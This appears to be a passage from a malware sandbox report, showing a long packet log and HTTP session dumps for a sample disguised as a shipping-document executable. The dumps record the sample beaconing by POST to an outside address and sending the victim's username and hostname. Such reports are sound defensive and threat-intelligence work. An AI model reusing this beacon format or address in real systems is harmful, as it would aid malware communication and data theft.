Apr 25, 2024 09:43:46.105078936 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.105113983 CEST	49831	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.115915060 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.241796017 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:46.241898060 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.244048119 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.369791031 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:46.369883060 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:46.495666027 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.205128908 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.205267906 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.205307961 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.205338955 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.205338955 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.205456018 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.213737011 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.213800907 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214083910 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214133024 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214246035 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214299917 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214337111 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214387894 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214494944 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214539051 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214551926 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214576960 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.214591026 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.214626074 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.331370115 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.331412077 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.331444025 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.331454039 CEST	80	49832	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.331527948 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.331527948 CEST	49832	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.349926949 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.477118015 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.477215052 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.479485035 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.606606960 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:47.606699944 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:47.734168053 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.415240049 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.415296078 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.415328979 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.415380001 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.415380001 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.415380001 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.425446987 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.425532103 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.425626993 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.425685883 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.425743103 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.425810099 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.425856113 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.425906897 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.426044941 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.426086903 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.426095963 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.426125050 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.426137924 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.426175117 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.542650938 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.542692900 CEST	80	49833	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.542701006 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.542737961 CEST	49833	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.550956011 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.678390980 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.678473949 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.680283070 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.807535887 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:48.807760000 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:48.934984922 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.635854959 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.635963917 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.635982037 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.636029005 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.646401882 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.646517992 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.646917105 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.646954060 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.646975040 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.646987915 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.646996975 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.647031069 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.647141933 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.647183895 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.647192001 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.647229910 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.647372961 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.647412062 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.647418976 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.647456884 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.763006926 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.763062954 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.763206959 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.763245106 CEST	80	49834	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.763252020 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.763284922 CEST	49834	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.773098946 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.905040979 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:49.905183077 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:49.906919003 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.036711931 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.036832094 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.166071892 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.873189926 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.873224020 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.873291969 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.873291969 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.881438017 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.881489038 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.881711006 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.881756067 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.881839991 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.881886005 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.881925106 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.881968975 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.882101059 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.882119894 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.882142067 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.882174015 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.882246971 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.882285118 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:50.882292032 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:50.882320881 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.002819061 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:51.002878904 CEST	80	49835	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:51.003001928 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.003002882 CEST	49835	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.005300999 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.136118889 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:51.136257887 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.138011932 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.269076109 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:51.269185066 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:51.400070906 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.190967083 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.191026926 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.191121101 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.191184044 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.191184044 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.191184044 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.206783056 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.206958055 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.209263086 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.209316969 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.209402084 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.209450006 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.209625959 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.209671021 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.211304903 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.211345911 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.211359024 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.211383104 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.211393118 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.211429119 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.322160959 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.322225094 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.322386026 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.322484016 CEST	80	49836	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.322490931 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.322527885 CEST	49836	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.334510088 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.468362093 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.468575954 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.470303059 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.603225946 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:52.603302956 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:52.736426115 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.450469971 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.450628996 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.450666904 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.450695038 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.450743914 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.450743914 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462632895 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462670088 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462703943 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462779045 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462779045 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462779045 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462795019 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462832928 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462912083 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462949991 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.462951899 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.462987900 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.463193893 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.463234901 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.584064960 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.584130049 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.584224939 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.584266901 CEST	80	49837	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.584273100 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.584310055 CEST	49837	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.586256981 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.717263937 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.717386007 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.719259977 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.850147963 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:56.850287914 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:56.981453896 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.712359905 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.712426901 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.712512970 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.712560892 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.712570906 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.712610960 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.722717047 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.722830057 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723161936 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723196983 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723309040 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723309040 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723332882 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723387003 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723440886 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723496914 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723514080 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723608971 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.723647118 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.723700047 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.843801975 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.843878031 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.843898058 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.843919992 CEST	80	49838	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.843926907 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.843974113 CEST	49838	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.860383034 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.991070986 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:57.991323948 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:57.993135929 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.124054909 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.124128103 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.255629063 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.941550016 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.941605091 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.941647053 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.941683054 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.950481892 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.950530052 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.950798035 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.950839996 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.950886011 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.950930119 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.951003075 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.951062918 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.951208115 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.951328993 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.951365948 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.951409101 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.951447964 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:58.951450109 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:58.951488018 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:59.072662115 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:59.072721004 CEST	80	49839	45.77.223.48	192.168.2.4
Apr 25, 2024 09:43:59.072729111 CEST	49839	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:43:59.072798014 CEST	49839	80	192.168.2.4	45.77.223.48

HTTP Request Dependency Graph

45.77.223.48

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:41:57.336379051 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 176 Connection: close
Apr 25, 2024 09:41:57.470454931 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones123716JONES-PCk0FDD42EE188E931437F4FBE2C1v1yF
Apr 25, 2024 09:41:58.420763016 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:41:57 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:41:58.420820951 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:41:58.421011925 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:41:58.421130896 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:41:58.421236038 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:41:58.429910898 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:41:58.430213928 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:41:58.430226088 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:41:58.430366993 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:41:58.430546045 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:41:58.700834990 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 176 Connection: close
Apr 25, 2024 09:41:58.827822924 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones123716JONES-PC+0FDD42EE188E931437F4FBE2Cjq9lv
Apr 25, 2024 09:41:59.637592077 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:41:58 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
